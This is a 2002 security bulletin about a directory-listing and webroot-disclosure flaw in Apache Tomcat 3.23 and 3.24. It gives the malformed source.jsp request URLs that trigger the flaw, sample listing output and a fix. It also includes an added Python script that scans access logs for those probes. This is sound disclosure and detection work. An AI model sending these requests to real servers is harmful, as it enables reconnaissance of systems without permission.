Vulnerability in Apache Tomcat v3.23 & v3.24

2002-05-31T00:00:00
ID SECURITYVULNS:DOC:3002
Type securityvulns
Reporter Securityvulns
Modified 2002-05-31T00:00:00

Description

Procheckup Ltd

www.procheckup.com

Procheckup Security Bulletin PR02-05

Description: Tomcat source.jsp directory listing and webroot location display

Date: 8/1/2002

Application: Apache Tomcat Java server versions 3.23 and 3.24

Platform: Linux/Unix

Severity: Remote attackers can obtain listings of web directories and sometimes the location of webroot

Authors: Richard Brain [richard.brain@procheckup.com]

Vendor Status:

CVE Candidate: Not assigned

Reference: www.procheckup.com/security_info/vuln.html

Description:

Tomcat is the free open-source Java server, http://jakarta.apache.org/tomcat/.

Normally source.jsp is used to look at the source code of programs within the examples directories. A typical request is

http://webserver:80/examples/jsp/source.jsp?/jsp/num/numguess.jsp

We have found that by using source.jsp with a malformed input, a directory listing is displayed and the location of the webroot is sometimes disclosed.

The vulnerabilities may only work on port 8080 rather than port 80, depending on how the webserver has been configured with Tomcat.

Exploits

A) Requesting the following url :-

http://webserver:80/examples/jsp/source.jsp??

Gives the directory listing and webroot on 3.23; 3.24 just gives a directory listing.

<title>Directory Listing</title>
<base href="file://localhost/"WEBROOT"/webapps/examples/"><h1>/"WEBROOT"/webapps/examples</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="images">images</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsp">jsp</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="META-INF">META-INF</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="servlets">servlets</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="WEB-INF">WEB-INF</a><br>

B) Requesting the following url :-

http://webserver:80/examples/jsp/source.jsp?/jsp/

Gives the directory listing and webroot on 3.23; 3.24 just gives a directory listing on a subdirectory.

<title>Directory Listing</title>
<base href="file://localhost/"WEBROOT"/webapps/examples/jsp/"><h1>/"WEBROOT"/webapps/examples/jsp</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="cal">cal</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="checkbox">checkbox</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="colors">colors</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="dates">dates</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="error">error</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="forward">forward</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="include">include</a><br><img align=middle src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="index.html">index.html</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsptoserv">jsptoserv</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="num">num</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="plugin">plugin</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="security">security</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="sessions">sessions</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="simpletag">simpletag</a><br><img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="snp">snp</a><br><img align=middle src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="source.jsp">source.jsp</a><br>

Solution:

Delete the samples directory if not needed.
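
Where the examples were deployed, the access log shows whether source.jsp was ever called with an argument that names no file, and a captured response shows whether a filesystem path was exposed. The following is an added example, not part of the Procheckup bulletin: it assumes Common Log Format, and the log lines, addresses and install path are constructed sample data.

```python
import re
from urllib.parse import unquote

# Request field of a Common Log Format line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')
SOURCE_JSP = "/examples/jsp/source.jsp"
# Response markers taken from the bulletin's excerpts.
LISTING_TITLE = "<title>Directory Listing</title>"
BASE_HREF_RE = re.compile(r'<base\s+href="file://localhost(/[^"]*)"', re.I)


def is_listing_probe(target):
    """Heuristic: source.jsp called with an argument that names no file
    (normal use names one, e.g. /jsp/num/numguess.jsp)."""
    path, _, query = target.partition("?")
    if unquote(path) != SOURCE_JSP:
        return False
    last_segment = unquote(query).rsplit("/", 1)[-1]
    return "." not in last_segment


def scan_log(lines):
    """Return (line_number, target) for each suspicious source.jsp request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and is_listing_probe(match.group(1)):
            hits.append((number, match.group(1)))
    return hits


def leaked_path(body):
    """Return the filesystem path exposed in a listing response, else None."""
    if LISTING_TITLE not in body:
        return None
    match = BASE_HREF_RE.search(body)
    return match.group(1) if match else None


# Constructed sample data (documentation addresses, made-up install path).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jan/2002:10:00:01 +0000] "GET /examples/jsp/source.jsp?/jsp/num/numguess.jsp HTTP/1.0" 200 2104',
    '192.0.2.77 - - [08/Jan/2002:10:02:13 +0000] "GET /examples/jsp/source.jsp?? HTTP/1.0" 200 911',
    '192.0.2.77 - - [08/Jan/2002:10:02:20 +0000] "GET /examples/jsp/source.jsp?/jsp/ HTTP/1.0" 200 1873',
    '192.0.2.10 - - [08/Jan/2002:10:03:00 +0000] "GET /index.html HTTP/1.0" 200 512',
]
SAMPLE_BODY = '<title>Directory Listing</title><base href="file://localhost/opt/tomcat/webapps/examples/">'

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG), leaked_path(SAMPLE_BODY))
```

Any hit means the examples web application is still reachable on that server.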

Legal:

Copyright 2002 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.